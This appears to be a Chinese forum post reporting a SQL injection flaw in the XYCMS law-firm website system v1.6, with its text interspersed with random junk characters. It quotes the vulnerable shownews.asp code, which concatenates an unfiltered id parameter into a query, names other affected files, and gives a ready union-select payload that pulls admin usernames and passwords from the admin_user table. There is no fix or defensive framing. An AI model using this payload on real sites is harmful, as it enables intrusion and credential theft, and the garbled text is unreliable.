前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似 h0 I) u& P8 s! L5 K: l
/ H, i- X' V/ ~( R
淫荡分割线% W, ^: O2 q& w2 b
--------------------------------------------------------
. v, {1 w. J# F 0 i, k* o8 A- \# \
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)! S( U5 n0 X# @+ L
源码地址:http://down.chinaz.com/soft/29233.htm
) D- {% g8 q. K) J ! }# s @) O. q( d" e' H: Y! W
漏洞文件:shownews.asp& I/ g9 D: P2 v5 y
漏洞代码:7-13行& O& V# u* M# |- }; J- Z
% ^- g7 m8 Z4 q$ P
3 d0 z! h5 d b: {
<%
& R: t' R0 E6 iid=request.QueryString("id")& i; @5 E" ]8 ^
; W$ M; P; J2 M" D* }/ E: zset snews=server.createobject("adodb.recordset")
8 ?# l" u& y6 O* R2 o, d- a4 nexec="select * from [news] where id="&id$ ~6 S% r, d1 B! Y0 P
snews.open exec,conn,1,1
/ G5 I2 [ H/ _# ~4 R& ?%>/ m3 ~! W% B0 R6 o/ q; D0 b# r) ^
6 }; h% @1 B! [4 {+ h) \0 g
& J/ m1 Z0 O1 {4 Y/ i& X什么过滤都没有 直造成注入
% U: K( k# ]6 s: W3 O
& w i& U6 i/ N+ P$ M5 F7 K注入点:http://127.0.0.1:99/shownews.asp?id=xx
. _9 c! q2 a. T+ c8 s
7 D P& p; m; t3 y4 s4 i其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找; _) W* k2 B' K& S/ o3 K# U
6 j \5 F+ {7 y" Q5 t+ ]
; J" U' _5 G1 {9 Cexp: union select 1,admin,password,4,5,7 from admin_user! T( I/ i2 F( y/ |& y# v
+ W1 s; w8 `' x3 d |